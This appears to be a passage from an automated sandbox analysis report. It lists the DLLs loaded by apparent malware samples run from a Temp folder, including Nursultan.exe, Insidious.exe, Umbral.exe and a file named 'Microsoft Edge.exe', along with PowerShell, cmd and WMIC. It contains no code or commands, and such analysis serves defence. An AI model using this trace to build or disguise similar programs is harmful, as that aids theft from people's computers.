                            Source: C:\Users\user\AppData\Local\Temp\Nursultan2.exeSection loaded: apphelp.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\Nursultan2.exeSection loaded: kernel.appcore.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\Nursultan2.exeSection loaded: version.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\Nursultan2.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\Nursultan2.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\Nursultan2.exeSection loaded: uxtheme.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\Nursultan2.exeSection loaded: cryptsp.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\Nursultan2.exeSection loaded: rsaenh.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\Nursultan2.exeSection loaded: cryptbase.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\Nursultan2.exeSection loaded: windows.storage.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\Nursultan2.exeSection loaded: wldp.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\Nursultan2.exeSection loaded: propsys.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\Nursultan2.exeSection loaded: profapi.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\Nursultan2.exeSection loaded: edputil.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\Nursultan2.exeSection loaded: urlmon.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\Nursultan2.exeSection loaded: iertutil.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\Nursultan2.exeSection loaded: srvcli.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\Nursultan2.exeSection loaded: netutils.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\Nursultan2.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\Nursultan2.exeSection loaded: sspicli.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\Nursultan2.exeSection loaded: wintypes.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\Nursultan2.exeSection loaded: appresolver.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\Nursultan2.exeSection loaded: bcp47langs.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\Nursultan2.exeSection loaded: slc.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\Nursultan2.exeSection loaded: userenv.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\Nursultan2.exeSection loaded: sppc.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\Nursultan2.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\Nursultan2.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\Nursultan.exeSection loaded: mscoree.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\Nursultan.exeSection loaded: kernel.appcore.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\Nursultan.exeSection loaded: version.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\Nursultan.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\Nursultan.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\Nursultan.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\Nursultan.exeSection loaded: uxtheme.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\Nursultan.exeSection loaded: cryptsp.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\Nursultan.exeSection loaded: rsaenh.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\Nursultan.exeSection loaded: cryptbase.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\Nursultan.exeSection loaded: windows.storage.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\Nursultan.exeSection loaded: wldp.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\Nursultan.exeSection loaded: propsys.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\Nursultan.exeSection loaded: profapi.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\Nursultan.exeSection loaded: edputil.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\Nursultan.exeSection loaded: urlmon.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\Nursultan.exeSection loaded: iertutil.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\Nursultan.exeSection loaded: srvcli.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\Nursultan.exeSection loaded: netutils.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\Nursultan.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\Nursultan.exeSection loaded: sspicli.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\Nursultan.exeSection loaded: wintypes.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\Nursultan.exeSection loaded: appresolver.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\Nursultan.exeSection loaded: bcp47langs.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\Nursultan.exeSection loaded: slc.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\Nursultan.exeSection loaded: userenv.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\Nursultan.exeSection loaded: sppc.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\Nursultan.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\Nursultan.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dll
                            Source: C:\Windows\System32\cmd.exeSection loaded: cmdext.dll
                            Source: C:\Users\user\AppData\Local\Temp\Nursultan2.exeSection loaded: mscoree.dll
                            Source: C:\Users\user\AppData\Local\Temp\Nursultan2.exeSection loaded: kernel.appcore.dll
                            Source: C:\Users\user\AppData\Local\Temp\Nursultan2.exeSection loaded: version.dll
                            Source: C:\Users\user\AppData\Local\Temp\Nursultan2.exeSection loaded: vcruntime140_clr0400.dll
                            Source: C:\Users\user\AppData\Local\Temp\Nursultan2.exeSection loaded: ucrtbase_clr0400.dll
                            Source: C:\Users\user\AppData\Local\Temp\Nursultan2.exeSection loaded: ucrtbase_clr0400.dll
                            Source: C:\Users\user\AppData\Local\Temp\Nursultan2.exeSection loaded: uxtheme.dll
                            Source: C:\Users\user\AppData\Local\Temp\Nursultan2.exeSection loaded: cryptsp.dll
                            Source: C:\Users\user\AppData\Local\Temp\Nursultan2.exeSection loaded: rsaenh.dll
                            Source: C:\Users\user\AppData\Local\Temp\Nursultan2.exeSection loaded: cryptbase.dll
                            Source: C:\Users\user\AppData\Local\Temp\Nursultan2.exeSection loaded: windows.storage.dll
                            Source: C:\Users\user\AppData\Local\Temp\Nursultan2.exeSection loaded: wldp.dll
                            Source: C:\Users\user\AppData\Local\Temp\Nursultan2.exeSection loaded: propsys.dll
                            Source: C:\Users\user\AppData\Local\Temp\Nursultan2.exeSection loaded: profapi.dll
                            Source: C:\Users\user\AppData\Local\Temp\Nursultan2.exeSection loaded: edputil.dll
                            Source: C:\Users\user\AppData\Local\Temp\Nursultan2.exeSection loaded: urlmon.dll
                            Source: C:\Users\user\AppData\Local\Temp\Nursultan2.exeSection loaded: iertutil.dll
                            Source: C:\Users\user\AppData\Local\Temp\Nursultan2.exeSection loaded: srvcli.dll
                            Source: C:\Users\user\AppData\Local\Temp\Nursultan2.exeSection loaded: netutils.dll
                            Source: C:\Users\user\AppData\Local\Temp\Nursultan2.exeSection loaded: windows.staterepositoryps.dll
                            Source: C:\Users\user\AppData\Local\Temp\Nursultan2.exeSection loaded: sspicli.dll
                            Source: C:\Users\user\AppData\Local\Temp\Nursultan2.exeSection loaded: wintypes.dll
                            Source: C:\Users\user\AppData\Local\Temp\Nursultan2.exeSection loaded: appresolver.dll
                            Source: C:\Users\user\AppData\Local\Temp\Nursultan2.exeSection loaded: bcp47langs.dll
                            Source: C:\Users\user\AppData\Local\Temp\Nursultan2.exeSection loaded: slc.dll
                            Source: C:\Users\user\AppData\Local\Temp\Nursultan2.exeSection loaded: userenv.dll
                            Source: C:\Users\user\AppData\Local\Temp\Nursultan2.exeSection loaded: sppc.dll
                            Source: C:\Users\user\AppData\Local\Temp\Nursultan2.exeSection loaded: onecorecommonproxystub.dll
                            Source: C:\Users\user\AppData\Local\Temp\Nursultan2.exeSection loaded: onecoreuapcommonproxystub.dll
                            Source: C:\Users\user\AppData\Local\Temp\Insidious.exeSection loaded: mscoree.dll
                            Source: C:\Users\user\AppData\Local\Temp\Insidious.exeSection loaded: apphelp.dll
                            Source: C:\Users\user\AppData\Local\Temp\Insidious.exeSection loaded: kernel.appcore.dll
                            Source: C:\Users\user\AppData\Local\Temp\Insidious.exeSection loaded: version.dll
                            Source: C:\Users\user\AppData\Local\Temp\Insidious.exeSection loaded: vcruntime140_clr0400.dll
                            Source: C:\Users\user\AppData\Local\Temp\Insidious.exeSection loaded: ucrtbase_clr0400.dll
                            Source: C:\Users\user\AppData\Local\Temp\Insidious.exeSection loaded: ucrtbase_clr0400.dll
                            Source: C:\Users\user\AppData\Local\Temp\Insidious.exeSection loaded: windows.storage.dll
                            Source: C:\Users\user\AppData\Local\Temp\Insidious.exeSection loaded: wldp.dll
                            Source: C:\Users\user\AppData\Local\Temp\Insidious.exeSection loaded: profapi.dll
                            Source: C:\Users\user\AppData\Local\Temp\Insidious.exeSection loaded: cryptsp.dll
                            Source: C:\Users\user\AppData\Local\Temp\Insidious.exeSection loaded: rsaenh.dll
                            Source: C:\Users\user\AppData\Local\Temp\Insidious.exeSection loaded: cryptbase.dll
                            Source: C:\Users\user\AppData\Local\Temp\Insidious.exeSection loaded: ntmarta.dll
                            Source: C:\Users\user\AppData\Local\Temp\Insidious.exeSection loaded: rasapi32.dll
                            Source: C:\Users\user\AppData\Local\Temp\Insidious.exeSection loaded: rasman.dll
                            Source: C:\Users\user\AppData\Local\Temp\Insidious.exeSection loaded: rtutils.dll
                            Source: C:\Users\user\AppData\Local\Temp\Insidious.exeSection loaded: sspicli.dll
                            Source: C:\Users\user\AppData\Local\Temp\Insidious.exeSection loaded: mswsock.dll
                            Source: C:\Users\user\AppData\Local\Temp\Insidious.exeSection loaded: winhttp.dll
                            Source: C:\Users\user\AppData\Local\Temp\Insidious.exeSection loaded: ondemandconnroutehelper.dll
                            Source: C:\Users\user\AppData\Local\Temp\Insidious.exeSection loaded: iphlpapi.dll
                            Source: C:\Users\user\AppData\Local\Temp\Insidious.exeSection loaded: dhcpcsvc6.dll
                            Source: C:\Users\user\AppData\Local\Temp\Insidious.exeSection loaded: dhcpcsvc.dll
                            Source: C:\Users\user\AppData\Local\Temp\Insidious.exeSection loaded: dnsapi.dll
                            Source: C:\Users\user\AppData\Local\Temp\Insidious.exeSection loaded: winnsi.dll
                            Source: C:\Users\user\AppData\Local\Temp\Insidious.exeSection loaded: rasadhlp.dll
                            Source: C:\Users\user\AppData\Local\Temp\Insidious.exeSection loaded: fwpuclnt.dll
                            Source: C:\Users\user\AppData\Local\Temp\Insidious.exeSection loaded: secur32.dll
                            Source: C:\Users\user\AppData\Local\Temp\Insidious.exeSection loaded: schannel.dll
                            Source: C:\Users\user\AppData\Local\Temp\Insidious.exeSection loaded: mskeyprotect.dll
                            Source: C:\Users\user\AppData\Local\Temp\Insidious.exeSection loaded: ntasn1.dll
                            Source: C:\Users\user\AppData\Local\Temp\Insidious.exeSection loaded: ncrypt.dll
                            Source: C:\Users\user\AppData\Local\Temp\Insidious.exeSection loaded: ncryptsslp.dll
                            Source: C:\Users\user\AppData\Local\Temp\Insidious.exeSection loaded: msasn1.dll
                            Source: C:\Users\user\AppData\Local\Temp\Insidious.exeSection loaded: gpapi.dll
                            Source: C:\Users\user\AppData\Local\Temp\Insidious.exeSection loaded: uxtheme.dll
                            Source: C:\Users\user\AppData\Local\Temp\Insidious.exeSection loaded: windowscodecs.dll
                            Source: C:\Users\user\AppData\Local\Temp\Insidious.exeSection loaded: wbemcomn.dll
                            Source: C:\Users\user\AppData\Local\Temp\Insidious.exeSection loaded: amsi.dll
                            Source: C:\Users\user\AppData\Local\Temp\Insidious.exeSection loaded: userenv.dll
                            Source: C:\Users\user\AppData\Local\Temp\Nursultan.exeSection loaded: mscoree.dll
                            Source: C:\Users\user\AppData\Local\Temp\Nursultan.exeSection loaded: kernel.appcore.dll
                            Source: C:\Users\user\AppData\Local\Temp\Nursultan.exeSection loaded: version.dll
                            Source: C:\Users\user\AppData\Local\Temp\Nursultan.exeSection loaded: vcruntime140_clr0400.dll
                            Source: C:\Users\user\AppData\Local\Temp\Nursultan.exeSection loaded: ucrtbase_clr0400.dll
                            Source: C:\Users\user\AppData\Local\Temp\Nursultan.exeSection loaded: ucrtbase_clr0400.dll
                            Source: C:\Users\user\AppData\Local\Temp\Nursultan.exeSection loaded: uxtheme.dll
                            Source: C:\Users\user\AppData\Local\Temp\Nursultan.exeSection loaded: cryptsp.dll
                            Source: C:\Users\user\AppData\Local\Temp\Nursultan.exeSection loaded: rsaenh.dll
                            Source: C:\Users\user\AppData\Local\Temp\Nursultan.exeSection loaded: cryptbase.dll
                            Source: C:\Users\user\AppData\Local\Temp\Nursultan.exeSection loaded: windows.storage.dll
                            Source: C:\Users\user\AppData\Local\Temp\Nursultan.exeSection loaded: wldp.dll
                            Source: C:\Users\user\AppData\Local\Temp\Nursultan.exeSection loaded: propsys.dll
                            Source: C:\Users\user\AppData\Local\Temp\Nursultan.exeSection loaded: profapi.dll
                            Source: C:\Users\user\AppData\Local\Temp\Nursultan.exeSection loaded: edputil.dll
                            Source: C:\Users\user\AppData\Local\Temp\Nursultan.exeSection loaded: urlmon.dll
                            Source: C:\Users\user\AppData\Local\Temp\Nursultan.exeSection loaded: iertutil.dll
                            Source: C:\Users\user\AppData\Local\Temp\Nursultan.exeSection loaded: srvcli.dll
                            Source: C:\Users\user\AppData\Local\Temp\Nursultan.exeSection loaded: netutils.dll
                            Source: C:\Users\user\AppData\Local\Temp\Nursultan.exeSection loaded: windows.staterepositoryps.dll
                            Source: C:\Users\user\AppData\Local\Temp\Nursultan.exeSection loaded: sspicli.dll
                            Source: C:\Users\user\AppData\Local\Temp\Nursultan.exeSection loaded: wintypes.dll
                            Source: C:\Users\user\AppData\Local\Temp\Nursultan.exeSection loaded: appresolver.dll
                            Source: C:\Users\user\AppData\Local\Temp\Nursultan.exeSection loaded: bcp47langs.dll
                            Source: C:\Users\user\AppData\Local\Temp\Nursultan.exeSection loaded: slc.dll
                            Source: C:\Users\user\AppData\Local\Temp\Nursultan.exeSection loaded: userenv.dll
                            Source: C:\Users\user\AppData\Local\Temp\Nursultan.exeSection loaded: sppc.dll
                            Source: C:\Users\user\AppData\Local\Temp\Nursultan.exeSection loaded: onecorecommonproxystub.dll
                            Source: C:\Users\user\AppData\Local\Temp\Nursultan.exeSection loaded: onecoreuapcommonproxystub.dll
                            Source: C:\Users\user\AppData\Local\Temp\Microsoft Edge.exeSection loaded: mscoree.dll
                            Source: C:\Users\user\AppData\Local\Temp\Microsoft Edge.exeSection loaded: kernel.appcore.dll
                            Source: C:\Users\user\AppData\Local\Temp\Microsoft Edge.exeSection loaded: version.dll
                            Source: C:\Users\user\AppData\Local\Temp\Microsoft Edge.exeSection loaded: vcruntime140_clr0400.dll
                            Source: C:\Users\user\AppData\Local\Temp\Microsoft Edge.exeSection loaded: ucrtbase_clr0400.dll
                            Source: C:\Users\user\AppData\Local\Temp\Microsoft Edge.exeSection loaded: ucrtbase_clr0400.dll
                            Source: C:\Users\user\AppData\Local\Temp\Microsoft Edge.exeSection loaded: uxtheme.dll
                            Source: C:\Users\user\AppData\Local\Temp\Microsoft Edge.exeSection loaded: sspicli.dll
                            Source: C:\Users\user\AppData\Local\Temp\Microsoft Edge.exeSection loaded: cryptsp.dll
                            Source: C:\Users\user\AppData\Local\Temp\Microsoft Edge.exeSection loaded: rsaenh.dll
                            Source: C:\Users\user\AppData\Local\Temp\Microsoft Edge.exeSection loaded: cryptbase.dll
                            Source: C:\Users\user\AppData\Local\Temp\Umbral.exeSection loaded: mscoree.dll
                            Source: C:\Users\user\AppData\Local\Temp\Umbral.exeSection loaded: apphelp.dll
                            Source: C:\Users\user\AppData\Local\Temp\Umbral.exeSection loaded: kernel.appcore.dll
                            Source: C:\Users\user\AppData\Local\Temp\Umbral.exeSection loaded: version.dll
                            Source: C:\Users\user\AppData\Local\Temp\Umbral.exeSection loaded: vcruntime140_clr0400.dll
                            Source: C:\Users\user\AppData\Local\Temp\Umbral.exeSection loaded: ucrtbase_clr0400.dll
                            Source: C:\Users\user\AppData\Local\Temp\Umbral.exeSection loaded: ucrtbase_clr0400.dll
                            Source: C:\Users\user\AppData\Local\Temp\Umbral.exeSection loaded: windows.storage.dll
                            Source: C:\Users\user\AppData\Local\Temp\Umbral.exeSection loaded: wldp.dll
                            Source: C:\Users\user\AppData\Local\Temp\Umbral.exeSection loaded: profapi.dll
                            Source: C:\Users\user\AppData\Local\Temp\Umbral.exeSection loaded: cryptsp.dll
                            Source: C:\Users\user\AppData\Local\Temp\Umbral.exeSection loaded: rsaenh.dll
                            Source: C:\Users\user\AppData\Local\Temp\Umbral.exeSection loaded: cryptbase.dll
                            Source: C:\Users\user\AppData\Local\Temp\Umbral.exeSection loaded: iphlpapi.dll
                            Source: C:\Users\user\AppData\Local\Temp\Umbral.exeSection loaded: dnsapi.dll
                            Source: C:\Users\user\AppData\Local\Temp\Umbral.exeSection loaded: dhcpcsvc6.dll
                            Source: C:\Users\user\AppData\Local\Temp\Umbral.exeSection loaded: dhcpcsvc.dll
                            Source: C:\Users\user\AppData\Local\Temp\Umbral.exeSection loaded: winnsi.dll
                            Source: C:\Users\user\AppData\Local\Temp\Umbral.exeSection loaded: rasapi32.dll
                            Source: C:\Users\user\AppData\Local\Temp\Umbral.exeSection loaded: rasman.dll
                            Source: C:\Users\user\AppData\Local\Temp\Umbral.exeSection loaded: rtutils.dll
                            Source: C:\Users\user\AppData\Local\Temp\Umbral.exeSection loaded: mswsock.dll
                            Source: C:\Users\user\AppData\Local\Temp\Umbral.exeSection loaded: winhttp.dll
                            Source: C:\Users\user\AppData\Local\Temp\Umbral.exeSection loaded: ondemandconnroutehelper.dll
                            Source: C:\Users\user\AppData\Local\Temp\Umbral.exeSection loaded: rasadhlp.dll
                            Source: C:\Users\user\AppData\Local\Temp\Umbral.exeSection loaded: fwpuclnt.dll
                            Source: C:\Users\user\AppData\Local\Temp\Umbral.exeSection loaded: secur32.dll
                            Source: C:\Users\user\AppData\Local\Temp\Umbral.exeSection loaded: sspicli.dll
                            Source: C:\Users\user\AppData\Local\Temp\Umbral.exeSection loaded: schannel.dll
                            Source: C:\Users\user\AppData\Local\Temp\Umbral.exeSection loaded: mskeyprotect.dll
                            Source: C:\Users\user\AppData\Local\Temp\Umbral.exeSection loaded: ntasn1.dll
                            Source: C:\Users\user\AppData\Local\Temp\Umbral.exeSection loaded: ncrypt.dll
                            Source: C:\Users\user\AppData\Local\Temp\Umbral.exeSection loaded: ncryptsslp.dll
                            Source: C:\Users\user\AppData\Local\Temp\Umbral.exeSection loaded: msasn1.dll
                            Source: C:\Users\user\AppData\Local\Temp\Umbral.exeSection loaded: gpapi.dll
                            Source: C:\Users\user\AppData\Local\Temp\Umbral.exeSection loaded: ntmarta.dll
                            Source: C:\Users\user\AppData\Local\Temp\Umbral.exeSection loaded: dpapi.dll
                            Source: C:\Users\user\AppData\Local\Temp\Umbral.exeSection loaded: sxs.dll
                            Source: C:\Users\user\AppData\Local\Temp\Umbral.exeSection loaded: devenum.dll
                            Source: C:\Users\user\AppData\Local\Temp\Umbral.exeSection loaded: winmm.dll
                            Source: C:\Users\user\AppData\Local\Temp\Umbral.exeSection loaded: devobj.dll
                            Source: C:\Users\user\AppData\Local\Temp\Umbral.exeSection loaded: msdmo.dll
                            Source: C:\Users\user\AppData\Local\Temp\Umbral.exeSection loaded: uxtheme.dll
                            Source: C:\Users\user\AppData\Local\Temp\Umbral.exeSection loaded: windowscodecs.dll
                            Source: C:\Windows\System32\cmd.exeSection loaded: winbrand.dll
                            Source: C:\Windows\System32\cmd.exeSection loaded: wldp.dll
                            Source: C:\Windows\System32\chcp.comSection loaded: ulib.dll
                            Source: C:\Windows\System32\chcp.comSection loaded: fsutilext.dll
                            Source: C:\Windows\System32\timeout.exeSection loaded: version.dll
                            Source: C:\Windows\System32\cmd.exeSection loaded: cmdext.dll
                            Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: iphlpapi.dll
                            Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: framedynos.dll
                            Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: sspicli.dll
                            Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: kernel.appcore.dll
                            Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: wbemcomn.dll
                            Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: msxml6.dll
                            Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: urlmon.dll
                            Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: iertutil.dll
                            Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: srvcli.dll
                            Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: netutils.dll
                            Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: uxtheme.dll
                            Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vcruntime140.dll
                            Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vcruntime140_1.dll
                            Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: amsi.dll
                            Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: userenv.dll
                            Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: profapi.dll
                            Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vbscript.dll
                            Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: sxs.dll
                            Source: C:\Users\user\AppData\Local\Temp\Insidious.exeSection loaded: mscoree.dll
                            Source: C:\Users\user\AppData\Local\Temp\Insidious.exeSection loaded: kernel.appcore.dll
                            Source: C:\Users\user\AppData\Local\Temp\Insidious.exeSection loaded: version.dll
                            Source: C:\Users\user\AppData\Local\Temp\Insidious.exeSection loaded: vcruntime140_clr0400.dll
                            Source: C:\Users\user\AppData\Local\Temp\Insidious.exeSection loaded: ucrtbase_clr0400.dll
                            Source: C:\Users\user\AppData\Local\Temp\Insidious.exeSection loaded: ucrtbase_clr0400.dll
                            Source: C:\Users\user\AppData\Local\Temp\Insidious.exeSection loaded: windows.storage.dll
                            Source: C:\Users\user\AppData\Local\Temp\Insidious.exeSection loaded: wldp.dll
                            Source: C:\Users\user\AppData\Local\Temp\Insidious.exeSection loaded: profapi.dll
                            Source: C:\Users\user\AppData\Local\Temp\Insidious.exeSection loaded: cryptsp.dll
                            Source: C:\Users\user\AppData\Local\Temp\Insidious.exeSection loaded: rsaenh.dll
                            Source: C:\Users\user\AppData\Local\Temp\Insidious.exeSection loaded: cryptbase.dll
                            Source: C:\Users\user\AppData\Local\Temp\Nursultan2.exeSection loaded: mscoree.dll
                            Source: C:\Users\user\AppData\Local\Temp\Nursultan2.exeSection loaded: kernel.appcore.dll
                            Source: C:\Users\user\AppData\Local\Temp\Nursultan2.exeSection loaded: version.dll
                            Source: C:\Users\user\AppData\Local\Temp\Nursultan2.exeSection loaded: vcruntime140_clr0400.dll
                            Source: C:\Users\user\AppData\Local\Temp\Nursultan2.exeSection loaded: ucrtbase_clr0400.dll
                            Source: C:\Users\user\AppData\Local\Temp\Nursultan2.exeSection loaded: ucrtbase_clr0400.dll
                            Source: C:\Users\user\AppData\Local\Temp\Nursultan2.exeSection loaded: uxtheme.dll
                            Source: C:\Users\user\AppData\Local\Temp\Nursultan2.exeSection loaded: cryptsp.dll
                            Source: C:\Users\user\AppData\Local\Temp\Nursultan2.exeSection loaded: rsaenh.dll
                            Source: C:\Users\user\AppData\Local\Temp\Nursultan2.exeSection loaded: cryptbase.dll
                            Source: C:\Users\user\AppData\Local\Temp\Nursultan2.exeSection loaded: windows.storage.dll
                            Source: C:\Users\user\AppData\Local\Temp\Nursultan2.exeSection loaded: wldp.dll
                            Source: C:\Users\user\AppData\Local\Temp\Nursultan2.exeSection loaded: propsys.dll
                            Source: C:\Users\user\AppData\Local\Temp\Nursultan2.exeSection loaded: profapi.dll
                            Source: C:\Users\user\AppData\Local\Temp\Nursultan2.exeSection loaded: edputil.dll
                            Source: C:\Users\user\AppData\Local\Temp\Nursultan2.exeSection loaded: urlmon.dll
                            Source: C:\Users\user\AppData\Local\Temp\Nursultan2.exeSection loaded: iertutil.dll
                            Source: C:\Users\user\AppData\Local\Temp\Nursultan2.exeSection loaded: srvcli.dll
                            Source: C:\Users\user\AppData\Local\Temp\Nursultan2.exeSection loaded: netutils.dll
                            Source: C:\Users\user\AppData\Local\Temp\Nursultan2.exeSection loaded: windows.staterepositoryps.dll
                            Source: C:\Users\user\AppData\Local\Temp\Nursultan2.exeSection loaded: sspicli.dll
                            Source: C:\Users\user\AppData\Local\Temp\Nursultan2.exeSection loaded: wintypes.dll
                            Source: C:\Users\user\AppData\Local\Temp\Nursultan2.exeSection loaded: appresolver.dll
                            Source: C:\Users\user\AppData\Local\Temp\Nursultan2.exeSection loaded: bcp47langs.dll
                            Source: C:\Users\user\AppData\Local\Temp\Nursultan2.exeSection loaded: slc.dll
                            Source: C:\Users\user\AppData\Local\Temp\Nursultan2.exeSection loaded: userenv.dll
                            Source: C:\Users\user\AppData\Local\Temp\Nursultan2.exeSection loaded: sppc.dll
